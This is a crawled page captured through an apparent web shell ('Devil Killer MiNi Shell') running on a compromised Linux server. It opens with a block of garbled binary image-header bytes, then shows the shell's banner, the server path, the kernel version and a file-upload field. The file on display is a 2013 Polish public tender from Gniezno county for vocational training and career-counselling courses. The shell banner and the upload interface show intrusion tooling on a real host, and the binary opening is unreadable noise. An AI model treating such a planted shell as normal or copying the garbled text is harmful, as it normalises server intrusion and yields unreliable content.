JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20130218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20130218/25231-N-2013.html

<p class="kh_header"><b>Gniezno: Zorganizowanie i przeprowadzenie kursów szkolenia zawodowego 
i doradztwa zawodowego</b><br>
<b>Numer ogłoszenia: 25231 - 2013; data zamieszczenia: 18.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gnieźnieński , ul. Jana Pawła II 9/10, 62-200 Gniezno, woj. wielkopolskie, tel. 061 4240706, faks 061 4240770.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat-gniezno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów szkolenia zawodowego 
i doradztwa zawodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów szkolenia zawodowego i doradztwa zawodowego. 
Zamawiający niniejszym zamówieniem realizuje projekt Wyższe kwalifikacje - lepszy start współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki). Projekt realizowany będzie w Zespole Szkół Ponadgimnazjalnych nr 2 w Gnieźnie. Jego celem jest wdrożenie do 31.12.2014r. kompleksowego programu rozwojowego ZSP nr 2 w Gnieźnie zakładającego modernizację kształcenia zawodowego, rozszerzenie oferty edukacyjnej szkoły i dostosowującego ją do potrzeb lokalnego i regionalnego rynku pracy oraz podniesienie zdolności 100 uczniów 
i uczennic do dalszej edukacji i przyszłego zatrudnienia.
Szczegółowy zakres przedmiotu zamówienia: 
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów szkolenia zawodowego umożliwiających uzyskanie kwalifikacji:
	kurs spawania metodą MAG i TIG dla 48 uczniów/uczennic;
	kurs nauki jazdy kat. B dla 30 uczniów/uczennic;
	kurs nauki jazdy kat. B+E dla 10 uczniów/uczennic;
	kurs SEP - obsługa i eksploatacja urządzeń elektroenergetycznych do 1KV dla 
30 uczniów/uczennic;
	kurs obsługi wózka jezdniowego z napędem silnikowym dla 60 uczniów/uczennic, zakończonych egzaminem potwierdzającym uzyskanie kwalifikacji i nadaniem uprawnień oraz przeprowadzenie indywidualnych i grupowych (warsztaty) zajęć doradztwa zawodowego, specjalistycznych wykładów kierunkowych i konferencji dla maturzystów (100 osób).
Uregulowania wspólne dla części I, II, III i IV zamówienia:
1)	Kurs spawania metodą MAG i TIG - 
w okresie realizacji projektu przeprowadzone zostaną 4 edycje kursu (I w okresie od III - VI 2013 r, II w okresie od IX-XII 2013 r, III w okresie od I - VI 2014 r, IV w okresie od IX - XII 2014 r); 
	łącznie we wszystkich edycjach kursu udział weźmie 48 uczniów/uczennic, po 12 w każdej edycji kursu;
	zajęcia będą odbywać się w podziale na grupy o liczebności 6 osób - nie można łączyć grup, ani wprowadzać na zajęcia dodatkowych osób niebędących uczniami/uczennicami wskazanymi przez Zamawiającego; w każdej edycji kursu udział wezmą 2 grupy;
	zajęcia praktyczne odbywać się będą w Centrum Kształcenia Praktycznego Zespołu Szkół Ponadgimnazjalnych nr 2 w Gnieźnie przy ul. Słowackiego 45/47; Wykonawca zapewni pomieszczenia spawalni i 6 stanowisk spawalniczych (2 stanowiska spawalnicze metodą TIG, 4 stanowiska metodą MIG/MAG); pomieszczenia spawalni stanowią wkład własny w projekcie;
	program kursu musi być zgodny z Wytycznymi Instytutu Spawalniczego w Gliwicach:-	programy szkolenia spawaczy metodą MAG (135) blach i rur ze stali ferrytycznych i nierdzewnych W - 07/IS-02, -	programy szkolenia spawaczy metodą TIG (141) blach i rur ze stali ferrytycznych i nierdzewnych W - 07/IS-03
lub ich aktualniejszymi wersjami,
	liczba godzin zajęć teoretycznych wynosi 28,5 na grupę, a liczba godzin zajęć praktycznych wynosi 120 na grupę;
	Wykonawca przekaże każdemu uczestnikowi materiały szkoleniowe obejmujące: odzież ochronną (kombinezon, maska spawalnicza) oraz materiały dydaktyczne dot. realizowanego programu kursu (np. podręcznik lub skrypt), a także notes A4, teczkę 
z gumką i długopis. Wykonawca przekaże Zamawiającemu jeden egzemplarz tych materiałów wraz z potwierdzeniami ich odbioru przez każdego uczestnika;
	Wykonawca jest zobowiązany zapewnić materiały eksploatacyjne wykorzystywane podczas zajęć praktycznych. Materiały będą obejmowały:
-	drut spawalniczy fi 1mm -  10 kg
-	gaz CO2 - 1 butla
-	płaskownik na próbki - 10 kg
na 1 uczestnika kursu.
	Wykonawca otrzyma wynagrodzenie za realizację przedmiotu zamówienia - iloczyn ceny jednostkowej wskazanej w ofercie za jednego uczestnika kursu oraz liczby uczestników, którzy ukończą kurs i przystąpią do egzaminu:
	Wykonawca zobowiązany będzie do ubezpieczenia na czas trwania szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do 
i z miejsca szkolenia wskazanych przez Zamawiającego osób szkolonych (podlegających ubezpieczeniu).
2)	Kurs obsługi i eksploatacji urządzeń elektroenergetycznych do 1KV - 
	zajęcia będą odbywać się w podziale na grupy o liczebności ok. 10 osób; w każdej edycji kursu udział weźmie 1 grupa; nie można łączyć grup, ani wprowadzać na zajęcia dodatkowych osób niebędących uczniami wskazanymi przez Zamawiającego; łącznie w 3 edycjach kursu udział weźmie 30 osób;
	w okresie realizacji projektu zorganizowane zostaną 3 edycje kursu (I w okresie od III - VI 2013 r, II w okresie od I - VI 2014 r, III w okresie od IX - XII 2014 r);
	program kursu obejmuje zajęcia teoretyczne w wymiarze 30 h dla każdej edycji kursu;
	program szkolenia musi odpowiadać wymogom określonym w Rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. 2003, nr 89 poz. 828; Dz. U. 2003, nr 129 poz. 1124 oraz Dz. U. 2005, nr 141 poz. 1189);
	Wykonawca przekaże każdemu uczestnikowi materiały szkoleniowe tj. materiały dydaktyczne dot. realizowanego programu kursu (np. podręcznik lub skrypt), a także notes A4, teczkę z gumką i długopis. Wykonawca przekaże Zamawiającemu jeden egzemplarz tych materiałów wraz z potwierdzeniami ich odbioru przez każdego uczestnika;
	Wykonawca otrzyma wynagrodzenie za realizację przedmiotu zamówienia - iloczyn ceny za jedną godzinę wykładu oraz łącznej liczby godzin wykładu.
3)	Kurs nauki jazdy kat. B - 
	w okresie realizacji projektu zrealizowane zostaną 4 edycje kursu łącznie dla 30 uczniów/ uczennic (I w okresie od III - VI 2013 r, II w okresie od IX-XII 2013 r, III w okresie od I - VI 2014 r, IV w okresie od IX - XII 2014 r); w każdej edycji udział weźmie 6-8 osób; Łącznie w 4 edycjach udział weźmie 30 osób;
	zajęcia teoretyczne będą odbywać się w podziale na grupy o liczebności 6-8 osób; 
w każdej edycji kursu udział weźmie 1 grupa; nie można łączyć grup, ani wprowadzać na zajęcia dodatkowych osób niebędących uczniami wskazanymi przez Zamawiającego;
	szkolenie powinno odbywać się w formie kursu realizowanego wg planu nauczania zgodnego z zapisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów, Dz. U. z 2005 r. Nr 217 poz. 1834;
	plac manewrowy, na którym odbywać się będą zajęcia praktycznej nauki jazdy, musi spełniać wymogi określone w Rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów, Dz. U. z 2005 r. Nr 217 poz. 1834 oraz zgodnie z zapisami Ustawy z dnia 5 stycznia 2011 o kierujących pojazdami (Dz. U. 
z 2011 r. nr 30 poz.151);
	Wykonawca zobowiązany jest do zapewnienia uczestnikom szkolenia wszelkich niezbędnych materiałów szkoleniowych i dydaktycznych związanych z przeprowadzeniem kursu obejmujących realizowany program kursu tj. podręcznika, testów, notesu A4, teczki z gumką, długopisu itp. Materiały powinny być przekazane każdemu uczestnikowi szkolenia za pokwitowaniem na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć. Wykonawca przekaże Zamawiającemu jeden egzemplarz tych materiałów wraz z potwierdzeniami ich odbioru przez każdego uczestnika;
	Wykonawca zobowiązany będzie do ubezpieczenia na czas trwania szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do i z miejsca szkolenia wskazanych przez Zamawiającego osób szkolonych (podlegających ubezpieczeniu);
	Wykonawca jest zobowiązany do zorganizowania egzaminu wewnętrznego po zakończeniu kursu;
	Wykonawca otrzyma wynagrodzenie za realizację przedmiotu zamówienia - iloczyn ceny jednostkowej wskazanej w ofercie za jednego uczestnika kursu oraz liczby uczestników, którzy ukończą kurs i przystąpią do egzaminu.
4)	Kurs nauki jazdy kat. B+E - 
	w okresie realizacji projektu zrealizowane zostaną 2 edycje kursu (I w okresie od IX-XII 2013 r, II w okresie od I - VI 2014 r); Łącznie w 2 edycjach udział weźmie 
10 osób;
	zajęcia teoretyczne będą odbywać się w podziale na grupy o liczebności ok. 5 osób; 
w każdej edycji kursu udział weźmie 1 grupa; nie można łączyć grup, ani wprowadzać na zajęcia dodatkowych osób niebędących uczniami wskazanymi przez Zamawiającego;
	w zajęciach udział wezmą uczestnicy posiadający prawo jazdy kat. B (bądź zaświadczenie o uzyskaniu pozytywnego wyniku egzaminu państwowego w zakresie prawa jazdy kat. B);
	szkolenie powinno odbywać się w formie kursu realizowanego wg planu nauczania zgodnego z zapisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów, Dz. U. z 2005 r. Nr 217 poz. 1834 oraz zgodnie z zapisami Ustawy z dnia 5 stycznia 2011 o kierujących pojazdami (Dz. U. z 2011 r. nr 30 poz.151);
	plac manewrowy, na którym odbywać się będą zajęcia praktycznej nauki jazdy, musi spełniać wymogi określone w Rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów, Dz. U. z 2005 r. Nr 217 poz. 1834;
	Wykonawca zobowiązany będzie do ubezpieczenia na czas trwania szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do 
i z miejsca szkolenia wskazanych przez Zamawiającego osób szkolonych (podlegających ubezpieczeniu);
	Wykonawca zobowiązany jest do zapewnienia uczestnikom szkolenia wszelkich niezbędnych materiałów szkoleniowych i dydaktycznych związanych z przeprowadzeniem kursu tj. podręcznika, testów, notesu A4, teczki z gumką, długopisu. Materiały powinny być przekazane każdemu uczestnikowi szkolenia za pokwitowaniem na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć. Wykonawca przekaże Zamawiającemu jeden egzemplarz tych materiałów wraz z potwierdzeniami ich odbioru przez każdego uczestnika;
	Wykonawca jest zobowiązany do zorganizowania egzaminu wewnętrznego po zakończeniu kursu;
	Wykonawca otrzyma wynagrodzenie za realizację przedmiotu zamówienia - iloczyn ceny jednostkowej wskazanej w ofercie za jednego uczestnika kursu oraz liczby uczestników, którzy ukończą kurs i przystąpią do egzaminu.
5)	Kurs obsługi wózka jezdniowego z napędem silnikowym - 
	zajęcia będą odbywać się w podziale na grupy o liczebności około 10 osób; 
w każdej edycji kursu udział weźmie 1 grupa; nie można łączyć grup, ani wprowadzać na zajęcia dodatkowych osób niebędących uczniami wskazanymi przez Zamawiającego;
	zrealizowanych zostanie 6 edycji kursu (I w okresie od III - VI 2013 r, II w okresie od IX-XII 2013 r, III i IV w okresie od I - VI 2014 r, V i VI w okresie od IX - XII 2014 r), w każdej udział weźmie 10 uczestników/uczestniczek;
	program kursu musi zostać zatwierdzony przez Urząd Dozoru Technicznego. Dokument potwierdzający zatwierdzenie programu kursu zostanie przedstawiony Zamawiającemu min. 4 dni przed planowanym rozpoczęciem kursu;
	liczba godzin zajęć teoretycznych wynosi min. 15 godzin na grupę, a liczba godzin zajęć praktycznych/jazd na 1 osobę wynosi min. 5 godzin;
	zajęcia praktyczne odbędą się w miejscu wskazanym przez Wykonawcę w ofercie, spełniającym wymagania zgodnie z obowiązującymi przepisami prawa dotyczącymi realizacji kursów na operatora wózków widłowych. Miejsce/miejsca realizacji zajęć muszą znajdować się na terenie miasta Gniezna. Miejsce/miejsca realizacji zajęć wskazane w ofercie mogą ulec zmianie wyłącznie za zgodą Zamawiającego pod warunkiem, że Wykonawca wykaże, że w nowym proponowanym miejscu warunki prowadzenia kursu nie są gorsze niż w miejscu wskazanym w ofercie. Zmiana miejsca prowadzenia kursu nie wymaga zawarcia aneksu do umowy. Jeżeli Wykonawca będzie realizował kurs bądź część kursu w miejscu oddalonym od Zespołu Szkół Ponadgimnazjalnych nr 2 w Gnieźnie (zwanego dalej ZSP nr 2) więcej niż 2 km, jest zobowiązany zapewnić wszystkim uczniom transport na każde zajęcia spod siedziby ZSP nr 2 do miejsca realizacji kursu i z powrotem oraz opiekę w trakcie dowożenia i odwożenia uczniów;
	Wykonawca przekaże każdemu uczestnikowi materiały szkoleniowe obejmujące realizowany program kursu (materiały dydaktyczne) oraz notes A4, długopis i teczkę 
z gumką. Wykonawca przekaże Zamawiającemu jeden egzemplarz tych materiałów wraz z potwierdzeniami ich odbioru przez każdego uczestnika;
	Wykonawca zobowiązany będzie do ubezpieczenia na czas trwania szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do i z miejsca szkolenia wskazanych przez Zamawiającego osób szkolonych (podlegających ubezpieczeniu);
	Wykonawca otrzyma wynagrodzenie za realizację przedmiotu zamówienia - iloczyn ceny jednostkowej wskazanej w ofercie za jednego uczestnika kursu oraz liczby uczestników, którzy ukończą kurs i przystąpią do egzaminu.

Uregulowania szczegółowe dotyczące części V zamówienia - doradztwa zawodowego:
Indywidualne zajęcia doradztwa zawodowego - po 2 godziny dla każdego ze 100 uczniów/uczennic (za godzinę lekcyjną uznaje się 45 minut); zajęcia z doradztwa indywidualnego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, w tym  gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy, a także inne tematy wynikające ze szczególnych potrzeb uczestnika/uczestniczki. Doradztwo będzie prowadzone w oparciu o materiały dydaktyczne Wykonawcy.
Warsztaty doradztwa zawodowego - łącznie 40 warsztatów (po 3 godziny każdy) dla 10 grup uczniów/uczennic (każda grupa obejmować będzie średnio 10 uczniów/uczennic). Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów/uczennic ZSP nr 2 w Gnieźnie w wymiarze 120 godzin lekcyjnych (za godzinę lekcyjną uznaje się 45 minut). Łącznie każda grupa weźmie udział w 4 warsztatach (łącznie 12 h). Zajęcia 
z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, w tym  gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy. Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne Wykonawcy. W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi z uczestnikami ankiety pozwalające na ocenę kompetencji uczestników. Wykonawca jest zobowiązany do ustalenia szczegółowej tematyki warsztatów z uczestnikami zajęć w poszczególnych grupach przed rozpoczęciem pierwszych zajęć.
4 wykłady kierunkowe - W każdym roku realizacji projektu odbędą się 2 wykłady kierunkowe (tj. 2 w roku 2013 i 2 w roku 2014). Każdy wykład kierunkowy trwać będzie 2 godziny (za godzinę uznaje się godzinę lekcyjną, tj. 45 minut). Tematyka warsztatów zostanie ustalona przez Wykonawcę na podstawie rozpoznania przeprowadzonego wśród uczniów i uczennic ZSP nr 2 w Gnieźnie, w tym jeden z wykładów dotyczyć musi tematyki przedsiębiorczości. Wykłady prowadzone muszą być przez pracowników naukowych min. ze stopniem naukowym doktora lub specjalistów w temacie wykładu lub ekspertów wykazujących wieloletnie doświadczenie w temacie wykładu;
2 konferencje dla maturzystów - W każdym roku realizacji projektu odbędzie się 
1 konferencja dla maturzystów (tj. 1 w roku 2013 i 1 w roku 2014). Każda konferencja trwać będzie 4 godziny (za godzinę uznaje się godzinę lekcyjną, tj. 45 minut). Wykłady na konferencji prowadzone muszą być przez pracowników naukowych min. ze stopniem naukowym doktora lub specjalistów w temacie konferencji lub ekspertów wykazujących wieloletnie doświadczenie w temacie wykładów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.41.11.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć dokument - oświadczenie potwierdzające spełnianie przedmiotowego warunku.
Ocena spełniania w/w warunku będzie dokonywana metodą: spełnia/nie spełnia 
w oparciu o złożone dokumenty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I, II, III i IV zamówienia. 
Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż w ciągu ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, świadczył lub świadczy co najmniej 2 (dwie) usługi szkoleniowe równoważne pod względem przedmiotowym (rodzaj szkolenia, liczba godzin zajęć) ze szkoleniem będącym przedmiotem oferty.
Wykonawca zobowiązany będzie do załączenia dokumentów potwierdzających, że usługi te zostały wykonane/są wykonywane należycie.
Zamawiający uzna za równoważną usługę szkoleniową pod względem przedmiotowym jeżeli w jej zakresie będzie zrealizowany program pod względem tematycznym i czasowym w 70% zgodny z programem kursu będącego przedmiotem zamówienia. W takich okolicznościach Zamawiający wymaga aby do wykazu usług zrealizowanych załączyć dodatkowo pełny program szkolenia. Zamawiający zastrzega sobie prawo do żądania pełnej dokumentacji 
z wykazanych usług szkoleniowych jeżeli poweźmie wątpliwości do wykazanych szkoleń (dzienniki zajęć, kopie wydanych zaświadczeń, listy obecności, itp.).
Spełnienie przedmiotowego warunku udziału w postępowaniu dotyczy każdej części zamówienia.
Ocena spełniania w/w warunku będzie dokonywana metodą: spełnia/nie spełnia 
w oparciu o złożone dokumenty.
Dla części V zamówienia. 
Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż w ciągu ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, świadczył lub świadczy co najmniej 2 (dwie) usługi doradztwa zawodowego równoważne z przedmiotem zamówienia. Zrealizowane usługi zostaną uznane za równoważne pod względem przedmiotowym z usługą będącą przedmiotem oferty, jeżeli ujmować będą min. 2 z 3 wskazanych poniżej form wsparcia, które są przedmiotem V części zamówienia:
- indywidualne doradztwo zawodowe dla uczniów szkół ponadgimnazjalnych poruszające problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, w tym  gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia 
i przykładów dyskryminacji na rynku pracy, a także inne tematy wynikające ze szczególnych potrzeb uczestnika / uczestniczki.
- grupowe doradztwo zawodowe dla uczniów szkół ponadgimnazjalnych (warsztaty) poruszające problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV 
i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, w tym  gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy.
-  konferencje dla maturzystów / wykłady dla uczniów szkół ponadgimnazjalnych.
oraz pod względem tematycznym będą w 70% zgodne z programem usługi będącej przedmiotem zamówienia. W takich okolicznościach Zamawiający wymaga aby do wykazu usług zrealizowanych załączyć dodatkowo pełny program zrealizowanej usługi. Zamawiający zastrzega sobie prawo do żądania pełnej dokumentacji z wykazanych usług, jeżeli poweźmie wątpliwości do wykazanych usług (dzienniki zajęć, kopie wydanych zaświadczeń, listy obecności, itp.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I, II, III i IV zamówienia. 
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia oraz przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności oraz informacją 
o podstawie dysponowania tym osobami.
Prawidłowe wykonanie zamówienia przez wykonawcę jest możliwe m.in. pod warunkiem dysponowania przez niego osobami posiadającymi niezbędne kwalifikacje i doświadczenie umożliwiające przeprowadzenie szkolenia zgodnie z wymogami zamawiającego. Dlatego na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia wykonawca zobowiązany jest wykazać, że dysponuje minimum 1 osobą, posiadającą uprawnienia do prowadzenia szkoleń/kursów/zajęć w odniesieniu do kursu/ szkolenia którego dotyczy oferta, jeżeli przepisy prawa nakładają obowiązek ich posiadania, 
a także posiadają doświadczenie w przeprowadzeniu minimum 2 szkoleń/kursów/zajęć równoważnych z kursem/szkoleniem/zajęciami będącymi przedmiotem oferty, przeprowadzonych w okresie ostatnich 3 lat przed upływem terminu składania ofert.
Spełnienie przedmiotowego warunku udziału w postępowaniu dotyczy każdej części zamówienia.
